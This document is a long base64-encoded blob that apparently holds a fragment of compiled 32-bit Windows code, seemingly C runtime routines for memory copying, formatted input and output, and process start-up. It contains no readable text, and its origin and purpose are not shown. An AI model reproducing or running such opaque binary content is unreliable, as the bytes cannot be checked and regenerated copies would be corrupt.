iAeKRgGIRwGKRgKIRwKLRQheX8nDkI10MfyNfDn898cDAAAAdSTB6QKD4gOD
+QhyDf3zpfz/JJXgfkAAi//32f8kjZB+QACNSQCLx7oDAAAAg/kEcgyD4AMr
yP8kheh9QAD/JI3gfkAAkPh9QAAYfkAAQH5AAIpGAyPRiEcDTsHpAk+D+Qhy
tv3zpfz/JJXgfkAAjUkAikYDI9GIRwOKRgLB6QKIRwKD7gKD7wKD+QhyjP3z
pfz/JJXgfkAAkIpGAyPRiEcDikYCiEcCikYBwekCiEcBg+4Dg+8Dg/kID4Ja
/////fOl/P8kleB+QACNSQCUfkAAnH5AAKR+QACsfkAAtH5AALx+QADEfkAA
135AAItEjhyJRI8ci0SOGIlEjxiLRI4UiUSPFItEjhCJRI8Qi0SODIlEjwyL
RI4IiUSPCItEjgSJRI8EjQSNAAAAAAPwA/j/JJXgfkAAi//wfkAA+H5AAAh/
QAAcf0AAi0UIXl/Jw5CKRgOIRwOLRQheX8nDjUkAikYDiEcDikYCiEcCi0UI
Xl/Jw5CKRgOIRwOKRgKIRwKKRgGIRwGLRQheX8nDi0QkBKMAKUEAw6EAKUEA
acD9QwMABcOeJgCjAClBAMH4ECX/fwAAw8zMzFE9ABAAAI1MJAhyFIHpABAA
AC0AEAAAhQE9ABAAAHPsK8iLxIUBi+GLCItABFDDagH/dCQI6IsWAABZWcNV
i+yD7CCLRQjHRexJAAAAUIlF6IlF4OiH+P//iUXkjUUQUI1F4P91DFDouxYA
AIPEEMnDzMzMzMzMzMzMzMzMzMzMVYvsV1aLdQyLTRCLfQiLwYvRA8Y7/nYI
O/gPgngBAAD3xwMAAAB1FMHpAoPiA4P5CHIp86X/JJUogUAAi8e6AwAAAIPp
BHIMg+ADA8j/JIVAgEAA/ySNOIFAAJD/JI28gEAAkFCAQAB8gEAAoIBAACPR
igaIB4pGAYhHAYpGAsHpAohHAoPGA4PHA4P5CHLM86X/JJUogUAAjUkAI9GK
BogHikYBwekCiEcBg8YCg8cCg/kIcqbzpf8klSiBQACQI9GKBogHRsHpAkeD
+QhyjPOl/ySVKIFAAI1JAB+BQAAMgUAABIFAAPyAQAD0gEAA7IBAAOSAQADc
gEAAi0SO5IlEj+SLRI7oiUSP6ItEjuyJRI/si0SO8IlEj/CLRI70iUSP9ItE
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
